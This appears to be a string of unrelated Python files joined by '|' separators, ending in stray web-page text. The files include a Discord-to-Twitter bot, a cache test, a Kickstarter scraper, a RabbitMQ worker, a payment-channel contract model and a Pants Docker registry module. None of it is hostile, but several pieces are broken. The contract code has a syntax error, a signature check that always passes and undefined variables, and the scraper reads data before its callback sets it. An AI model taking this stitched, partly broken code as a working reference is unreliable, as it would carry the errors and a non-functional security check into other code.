'picture_url': user['userpic_https_url'].encode(encoding='utf-8', errors='ignore') if 'userpic_https_url' in user else user['userpic_url'].encode(encoding='utf-8', errors='ignore'),
'token': raw['access_token'] if 'access_token' in raw else None,
'master': True}
@staticmethod
def is_token_refresh():
return False
|
import unittest
import os
import tempfile
from gmc.core.cache import store
class TestStore(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._dummy_paths = {}
cls.next_path = 0
class Dummy:
def __init__(self, force=False):
self.storage = store('/tmp', force)
def get_name(self, name='dummy'):
n = self.storage[cls.dummy_path(0)]
if n is not None:
return n
self.storage[cls.dummy_path(0)] = name
return name
def set_name(self, name='dummy'):
n = self.storage[cls.dummy_path(0)]
if n is not None:
self.name = n
return n
self.name = name
self.storage[cls.dummy_path(0)] = name
return name
def destory(self):
os.remove(cls.dummy_path(0))
cls.Dummy = Dummy
def test_getter(self):
dum = self.Dummy()
name = dum.get_name('custom_name')
self.assertEqual(name, 'custom_name')
name = dum.get_name('another_name')
#this shows that old saved copy is used
self.assertEqual(name, 'custom_name')
dum.destory()
def test_setter(self):
dum = self.Dummy()
dum.set_name('custom_name')
self.assertEqual(dum.name, 'custom_name')
dum.set_name('different_name')
self.assertEqual(dum.name, 'custom_name')
dum.destory()
def test_force_reloading(self):
dum = self.Dummy(force=True)
name = dum.get_name('custom_name')
self.assertEqual(name, 'custom_name')
name = dum.get_name('another_name')
#this shows that new copy is made
self.assertEqual(name, 'another_name')
dum.destory()
@classmethod
def dummy_path(cls, name):
cls._dummy_paths[name] = os.path.join('/tmp', 'dummy'+str(name)+'.dat')
return cls._dummy_paths[name]
@classmethod
def tearDownClass(cls):
for path in cls._dummy_paths:
if os.path.isfile(cls._dummy_paths[path]):
os.remove(cls._dummy_paths[path])
|
num1,num2=float(input("num1 = ")),float(input("num2 = "))
print(num1+num2)
|
import discord
from discord.ext import commands
import asyncio
import twitter
from TwitApi import TwitApi
RobId = "154732271742615553"
def post_status(message,postcmd=False):
if len(message.attachments) >= 1:
attaches = []
for item in message.attachments:
attaches.append(item["url"])
try:
if postcmd == False:
print("Touchdown")
pst = TwitApi.PostUpdate(message.content[:250] or " ",media=attaches)
return pst
else:
print("Touchdown")
Content = message.content.split(" ")
pst = TwitApi.PostUpdate((" ".join(Content[1:]))[:250],media=attaches)
return pst
except TwitterError:
return False
else:
try:
if postcmd == False:
print("Touchdown")
pst = TwitApi.PostUpdate(message.content[:250] or " ")
return pst
else:
print("Touchdown")
Content = message.content.split(" ")
pst = TwitApi.PostUpdate( (" ".join(Content[1:]))[:250] )
return pst
except TwitterError:
return False
class ClientOwnerOnly:
def __init__(self,client):
self.client = client
@commands.command(pass_context=True)
async def bootup(self,ctx):
message = ctx.message
if message.author.id == RobId:
ContextOn = True
await self.client.say("Successfully booted up.")
else:
await self.client.say("You do not have the permissions to do that, %s!" % (message.author.mention))
@commands.command(pass_context=True)
async def bootdown(self,ctx):
message = ctx.message
if message.author.id == RobId:
ContextOn = False
await self.client.say("Successfully booted down.")
else:
await self.client.say("You do not have the permissions to do that, %s!" % (message.author.mention))
@commands.command(pass_context=True)
async def post(self,ctx):
message = ctx.message
if message is None:
self.client.say("Please enter a valid string message.")
if message.author.id == RobId:
await self.client.say("Posting message..")
post = post_status(message,postcmd=True)
await self.client.say(str(post))
await self.client.say("Posted message to twitter!")
else:
await self.client.say("You do not have the permissions to do that, %s!" % (message.author.mention))
@commands.command(pass_context=True)
async def ppost(self,ctx):
message = ctx.message
if message is None:
self.client.say("Please enter a valid string message.")
if message.author.id == RobId:
content = ctx.message.content.split(" ")
await self.client.say(" ".join(content))
await self.client.say(str(ctx.message.attachments) )
else:
await self.client.say("You do not have the permissions to do that, %s!" % (message.author.mention))
@commands.command(pass_context=True)
async def getmessages(self,ctx):
msgs = self.client.logs_from(self.client.get_channel('488054001795989524'))
print(str(msgs))
@commands.command(pass_context=True)
async def ban(self, ctx, member: discord.Member, days: int = 1):
if member is None:
self.client.say("Please enter a valid member.")
if ctx.message.author.id == RobId:
await self.client.ban(member,days)
await self.client.say("%s has been banned for %s days." % (member.mention,str(days)) )
def setup(client):
client.add_cog(ClientOwnerOnly(client))
|
"""
CCT 建模优化代码
坐标系平移旋转
作者:赵润晓
日期:2021年5月4日
"""
# 因为要使用父目录的 cctpy 所以加入
from os import error, path
import sys
sys.path.append(path.dirname(path.abspath(path.dirname(__file__))))
from cctpy import *
# X'Y'Z' 局部坐标系,因为相对于全局坐标系只有原点 location 不同,坐标轴方向采用默认值,即于全局坐标系一致
lcs = LocalCoordinateSystem(location=P3(2,2,1))
# 定义全局坐标系中的点
p_gcs = P3(2,3,3)
# 转为局部坐标系
p_lcs = lcs.point_to_local_coordinate(p_gcs)
# 可以再次转回全局坐标
p_gcs_2 = lcs.point_to_global_coordinate(p_lcs)
print(p_gcs)
print(p_lcs)
print(p_gcs == p_gcs_2)
# ------------------------------------------------ #
# X'Y'Z'
lcs_1 = LocalCoordinateSystem(x_direction=P3(
math.cos(BaseUtils.angle_to_radian(30)),
math.sin(BaseUtils.angle_to_radian(30)),
0
))
# X''Y''Z''
lcs_2 = LocalCoordinateSystem(location=P3(8,8,0),
x_direction=P3(
math.cos(BaseUtils.angle_to_radian(30)),
math.sin(BaseUtils.angle_to_radian(30)),
0
))
p = P3(10,16,0)
p1 = lcs_1.point_to_local_coordinate(p)
p2 = lcs_2.point_to_local_coordinate(p)
print(p1) # (16.660254037844386, 8.856406460551021, 0.0)
print(p2) # (5.732050807568877, 5.92820323027551, 0.0)
|
from datetime import datetime
import re
import scrapy
URL_TEMPLATE = 'https://www.kickstarter.com/discover/advanced?term=board+game&sort=popular&page='
PAGES = 1
def replace_last(source_string, replace_what, replace_with):
head, _sep, tail = source_string.rpartition(replace_what)
return head + replace_with + tail
def convert_date(input):
""" Converts date string like 2017-04-03T16:24:58-04:00 to something Excel-friendly, like 2017/04/04 """
parsed = datetime.strptime(replace_last(input, ":", ""), "%Y-%m-%dT%H:%M:%S%z")
return datetime.strftime(parsed, "%Y/%m/%d")
class KickstarterSpider(scrapy.Spider):
name = "kickstarter"
start_urls = [URL_TEMPLATE + str(page) for page in range(1, PAGES + 1)]
def parse(self, response):
projects = response.css('li.project')
print("INFO: Project count: " + str(len(projects)))
for project in projects:
project_link_anchor = project.css('h6.project-title > a')
project_link = project_link_anchor.css('::attr(href)').extract_first()
if project_link:
yield scrapy.Request(response.urljoin(project_link),
callback=self.parse_project)
break
# else:
# # Fallback to a different format
# project_link2 = project.css('.project-profile-title a::attr(href)').extract_first()
#
# if project_link2:
# yield scrapy.Request(response.urljoin(project_link2),
# callback=self.parse_project)
# else:
# print("ERROR: Could not link project")
def parse_project(self, response):
title = response.css('meta[property="og:title"]::attr(content)').extract_first()
pledged_data_element = response.css('#pledged')
goal = pledged_data_element.css('::attr(data-goal)').extract_first()
pledged = pledged_data_element.css('::attr(data-pledged)').extract_first()
backers = response.css('#backers_count::attr(data-backers-count)').extract_first()
previously_created = response.css('.mb2-md a.remote_modal_dialog::text').extract_first()
previously_created_count = 0
if previously_created == "First created":
previously_created_count = 1
elif previously_created:
match = re.search(r"(\d+) created", previously_created)
if match:
previously_created_count = int(match.group(1))
comments = response.css('.project-nav__link--comments .count data::attr(data-value)').extract_first()
# Start date is stored on the /updates page
updates_link = response.css('a.project-nav__link--updates::attr(href)').extract_first()
updates_page_request = scrapy.Request(response.urljoin(updates_link), callback=self.parse_project_updates)
item = {"ha": 1}
updates_page_request.meta['item'] = item
yield updates_page_request
print("AAAAAA")
start_date = item['start_date']
start_date_str = convert_date(start_date) if start_date else ""
# Same, there's probably a better way to extract end date but this works for now
end_date = response.css('.NS_projects__funding_bar .js-campaign-state__failed time::attr(datetime)').extract_first()
end_date_str = convert_date(end_date) if end_date else ""
yield {
'title': title,
'goal': goal,
'backers': backers,
'pledged': pledged,
'start_date': start_date_str,
'end_date': end_date_str,
'previously_created': previously_created_count,
'comments': comments
}
def parse_project_updates(self, response):
print("BBBBB")
start_date = response.css('.timeline__divider--launched time::attr(datetime)').extract_first()
item = response.meta['item']
item['start_date'] = start_date
return item
|
import math
def isPrime(n):
#returns a prime number.
# 0,1,2 are hard coded. This is an expensive function..
prime = True
check = math.sqrt(n)
if n == 0:
return False
if n == 1:
return False
if n == 2:
return True
for i in range(2,math.ceil(check)+1):
if n % i == 0:
prime = False
break
return prime
def indexInt(n):
# time complexity O(n)
index = [int(i) for i in str(n)]
return index
def primeDigitSums(n):
# this is also expensive. loops through all possible n digit numbers
# checks all 1,2,3,4,5 combinations
start = (1*(10**(n-1)))
end = (1*(10**(n)))
combos = [3,4,5]
count = 0
number_list = []
for item in range(start,end+1):
if checkSet(item):
number_list.append(item)
count += 1
return number_list
def checkSet(n: int):
# checks all combinations of length 1,2,3,4,5
first_list = indexInt(n)
def checkSub(n: list, length: int, end: int):
new_list = []
new_length = length + 1
satisfies = True
if length > end-1:
return satisfies
for numb in range(len(n)):
if numb + 1 > len(n)-1:
break
prev = n[numb] if type(n[numb]) == list else [n[numb]]
new_numb = prev + [first_list[numb+ length]]
if len(new_numb) in [3,4,5]:
if not isPrime(sum(new_numb)):
satisfies = False
break
new_list.append(new_numb)
return checkSub(new_list, length + 1, end) and satisfies
return checkSub(first_list, 1, 5)
if __name__ == "__main__":
pds = primeDigitSums(6)
print(pds)
print(len(pds))
|
#!/usr/bin/env python
'''
RabbitMQ receiver. Jobs are retreived as messages and converted into
python calls.
'''
activate_this_file = "../venv/bin/activate_this.py"
execfile(activate_this_file, dict(__file__=activate_this_file))
from viewsheds import grassCommonViewpoints
from srtmsql import pointQuery , makeTransparent
import pika , json , configparser
config = configparser.ConfigParser()
config.read('../config.ini')
options_ucmi = config._sections['ucmi.py']
viewshedDir = '../' + options_ucmi['viewsheddir']
# Connecting to RabbitMQ server
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.queue_delete(queue='task_queue')
channel.queue_declare(queue='task_queue')
def callback(ch, method, properties, body):
form = json.loads(body)[1]
fnction = json.loads(body)[0]
id = json.loads(body)[2]
altitude = float(form['altitude'])
greaterthan = (form['greaterthan'] == 'greaterthan')
viewNum = int(form['viewNum'])
dateStamp = form['dateStamp']
if fnction == 'grassCommonViewpoints':
grassCommonViewpoints(viewNum , greaterthan , altitude , id , dateStamp)
makeTransparent(id)
elif fnction == 'pointQuery':
lat = form['lat']
lng = form['lng']
pointNum = int(form['size'])
firstMarker = (pointNum == 1)
pointQuery(lat , lng , pointNum, firstMarker , viewNum , greaterthan , altitude , id , dateStamp)
# Process is completed, create empty done file
print(" [x] Done: %r" % body)
f = file('/'.join([viewshedDir , id , dateStamp + '.done']), 'w')
f.close()
channel.basic_consume(callback,
queue='task_queue')
print(' [*] Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
|
from uc.itm import UCWrappedFunctionality
from uc.utils import wait_for
import logging
log = logging.getLogger(__name__)
class Contract(UCWrappedFunctionality):
def __init__(self, k, bits, sid, pid, channels, pump, poly, importargs):
self.ssid = sid[0]
self.n = sid[1]
self.delta = sid[2]
self.settlement = self.delta * 2 # the challenge period
self.deadline = -1
self.nonce = -1
self.balances = sid[3]
self.flag = 'OPEN'
## Following is for general case, above is for channel's already open
# self.balances = [0] * self.n
# self.flag = 'CLOSED' # {'CLOSED', 'OPEN', 'CHALLANGE'}
# # 'CLOSED': channel closed
# # 'OPEN': channel open
# # 'CHALLANGE': enter into challenge period
UCWrappedFunctionality.__init__(self, k, bits, sid, pid, channels, poly, pump, importargs)
def _check_sig(self, party, sig, state):
# TODO: check if `party` sign the `state` with signature `sig`
return True or False
def _current_time(self):
# TODO: return current round
return current_round
# smart contract logic
def close_channel(data, imp):
_from = data['sender']
_state = data['state']
_sig = data['sig']
assert self.flag = 'OPEN'
for p in range(self.n):
if p != _from:
isHonest = self._check_sig(p, _sig[p], _state)
if isHonest:
# means also have receiver's signature
# Q: should the following action be scheduled for a delay?
self.flag = 'CLOSED'
msg = {
'msg': 'close_channel',
'imp': imp,
'data': data
}
self.wrapper_contract(-1, msg, imp) # Broadcast
leaked_msg = ('close', (_from))
self.leak(leaked_msg, 0)
else:
# means only sender's signature
# Q: should the following action be scheduled for a delay?
self.flag = 'CHALLANGE'
self.deadline = self.current_round() + self.settlement
msg = {
'msg': 'challenge',
'imp': imp,
'data': data
}
self.wrapper_contract(-1, msg, imp) # Broadcast
leaked_msg = ('challenge', (_from))
self.leak(leaked_msg, 0)
# smart contract logic
def init_channel(self, data, imp):
_from = data['sender']
_amt = data['amount']
# Q: should the following action be scheduled for a delay?
self.flag = 'OPEN'
msg = {
'msg': 'init_channel',
'imp': imp,
'data': data
}
self.wrapper_contract(-1, msg, imp) # Broadcast
leaked_msg = ('init', (_from, _amt))
self.leak(leaked_msg, 0)
# smart contract logic
# Q: should the following action be scheduled for a delay?
def recv_challenge(self, data, imp):
_from = data['sender']
_state = data['state']
_sig = data['sig']
assert self.flag == 'CHALLANGE'
assert self._current_time() <= self.deadline # ensure not due
assert _state['nonce'] >= self.nonce
for p in range(self.n):
assert self._check_sig(p, _sig[p], _state)
self.nonce = _state['nonce']
self.balances = _state['balances']
self.flag = 'CLOSED'
msg = {
'msg': 'close_channel',
'imp': imp,
'data': data
}
self.wrapper_contract(-1, msg, imp) # Broadcast
leaked_msg = ('challenge', (_from, _state, _sig))
self.leak(leaked_msg, 0)
# offchain synchronous channel
# used for communication between parties, relaying `msg`
def offchain_channel(self, _from, _to, msg, imp):
codeblock = (
'schedule',
self.__send2p,
(_to, msg, imp),
1
)
self.write('f2w', codeblock, imp)
m = wait_for(self.channels['w2f']).msg
assert m == ('OK',)
leaked_msg = ('send', (_from, _to, _amt))
self.leak(leaked_msg, 0)
# onchain synchronous channel
# used to simulate onchain mining txs
def wrapper_contract(self, sender, msg, imp):
if sender > 0: # sender is parties
codeblock = (
'schedule',
self.__send2c,
(msg, imp),
self.delta
)
self.write('f2w', codeblock, imp)
m = wait_for(self.channels['w2f']).msg
assert m == ('OK',)
elif sender == -1: # sender is contract, and this is broadcast
for _to in range(self.n):
codeblock = (
'schedule',
self.__send2p,
(_to, msg, imp),
1
)
self.write('f2w', codeblock, imp)
m = wait_for(self.channels['w2f']).msg
assert m == ('OK',)
else:
return
#Q: do we leak message here? or leak in the actual codeblock execution
#Q: how do we handle `imp` tokens?
def __send2p(self, i, msg, imp):
self.write('f2p', (i, msg), imp)
def __send2c(self, msg, imp):
self.write('w2f', (msg), imp)
# p2f handler
def party_msg(self, msg):
log.debug('Contract/Receive msg from P in real world: {}'.format(msg))
command = msg['msg']
imp = msg['imp']
data = msg['data']
sender = data['sender']
if command == 'send': # united interface with synchronous channel
# normal offchain payment
receiver = data['receiver']
self.offchain_channel(sender, receiver, msg, imp)
# === ^ offchain operations === v onchain operations
elif command == 'challenge' or \
command == 'init' or \
command == 'close':
self.wrapper_contract(sender, msg, imp)
# elif command == 'deposit':
# pass
# elif command == 'withdraw':
# pass
else:
self.pump.write("dump")
def adv_msg(self, d):
self.pump.write("dump")
def env_msg(self, msg):
self.pump.write("dump")
def wrapper_msg(self, msg):
log.debug('Contract/Receive msg from Wrapper: {}'.format(msg))
command = msg['msg']
imp = msg['imp']
data = msg['data']
if command == 'challenge':
# entering into challenge, receive challenge from P_{receiver}
self.recv_challenge(data, imp)
elif command == 'init':
self.init_channel(data, imp)
elif command == 'close':
self.close_channel(data, imp)
# elif command == 'deposit':
# pass
# elif command == 'withdraw':
# pass
else:
self.pump.write("dump")
|
#!/usr/bin/env python
#
#
#
"""
Froomi web media search engine, and pseudo streaming provider
Copyright (C) 2009 David Busby http://saiweb.co.uk
"""
import ConfigParser,sys,os
from time import time
class Froomi:
def __init__(self):
self.debug = False
self.confd = ''
#===============================================================================
# This function sets up the module import paths, and attempts to import the mods
#===============================================================================
def loadmods():
verbose('loadmods()')
path = '%s/modules' % (sys.path[0])
i = 0
for mod in os.listdir(path):
path = '%s/modules/%s' % (sys.path[0],mod)
if mod != '.svn':
if os.path.isdir(path):
sys.path.append(path)
try:
__import__(mod)
except ImportError,e:
print 'Failed to import module',mod,'Error:',e
sys.exit(1)
else:
i+=1
verbose('Loaded %s' % (mod))
verbose('loadmods() complete %s module(s) loaded' % (i))
#===============================================================================
# verbose function
#===============================================================================
def verbose(str):
if opts.verbose:
print'%s: %s' % (time(),str)
#===============================================================================
# opts data subclass, used as a 'shared' store between threads
#===============================================================================
class opts:
threads = []
exit = False
verbose = True
if __name__ == "__main__":
loadmods()
main()
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from typing import Any, Iterator
from pants.option.parser import Parser
from pants.util.frozendict import FrozenDict
from pants.util.strutil import softwrap
ALL_DEFAULT_REGISTRIES = "<all default registries>"
class DockerRegistryError(ValueError):
pass
class DockerRegistryOptionsNotFoundError(DockerRegistryError):
def __init__(self, message):
super().__init__(
f"{message}\n\n"
"Use the [docker].registries configuration option to define custom registries."
)
class DockerRegistryAddressCollisionError(DockerRegistryError):
def __init__(self, first, second):
message = softwrap(
f"""
Duplicated docker registry address for aliases: {first.alias}, {second.alias}.
Each registry `address` in `[docker].registries` must be unique.
"""
)
super().__init__(message)
@dataclass(frozen=True)
class DockerRegistryOptions:
address: str
alias: str = ""
default: bool = False
skip_push: bool = False
extra_image_tags: tuple[str, ...] = ()
repository: str | None = None
use_local_alias: bool = False
@classmethod
def from_dict(cls, alias: str, d: dict[str, Any]) -> DockerRegistryOptions:
return cls(
alias=alias,
address=d["address"],
default=Parser.ensure_bool(d.get("default", alias == "default")),
skip_push=Parser.ensure_bool(d.get("skip_push", DockerRegistryOptions.skip_push)),
extra_image_tags=tuple(
d.get("extra_image_tags", DockerRegistryOptions.extra_image_tags)
),
repository=Parser.to_value_type(d.get("repository"), str, None),
use_local_alias=Parser.ensure_bool(d.get("use_local_alias", False)),
)
def register(self, registries: dict[str, DockerRegistryOptions]) -> None:
if self.address in registries:
collision = registries[self.address]
raise DockerRegistryAddressCollisionError(collision, self)
registries[self.address] = self
if self.alias:
registries[f"@{self.alias}"] = self
@dataclass(frozen=True)
class DockerRegistries:
default: tuple[DockerRegistryOptions, ...]
registries: FrozenDict[str, DockerRegistryOptions]
@classmethod
def from_dict(cls, d: dict[str, Any]) -> DockerRegistries:
registries: dict[str, DockerRegistryOptions] = {}
for alias, options in d.items():
DockerRegistryOptions.from_dict(alias, options).register(registries)
return cls(
default=tuple(
sorted({r for r in registries.values() if r.default}, key=lambda r: r.address)
),
registries=FrozenDict(registries),
)
def get(self, *aliases_or_addresses: str) -> Iterator[DockerRegistryOptions]:
for alias_or_address in aliases_or_addresses:
if alias_or_address in self.registries:
# Get configured registry by "@alias" or "address".
yield self.registries[alias_or_address]
elif alias_or_address.startswith("@"):
raise DockerRegistryOptionsNotFoundError(
f"There is no Docker registry configured with alias: {alias_or_address[1:]}."
)
elif alias_or_address == ALL_DEFAULT_REGISTRIES:
yield from self.default
else:
# Assume a explicit address from the BUILD file.
yield DockerRegistryOptions(address=alias_or_address)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.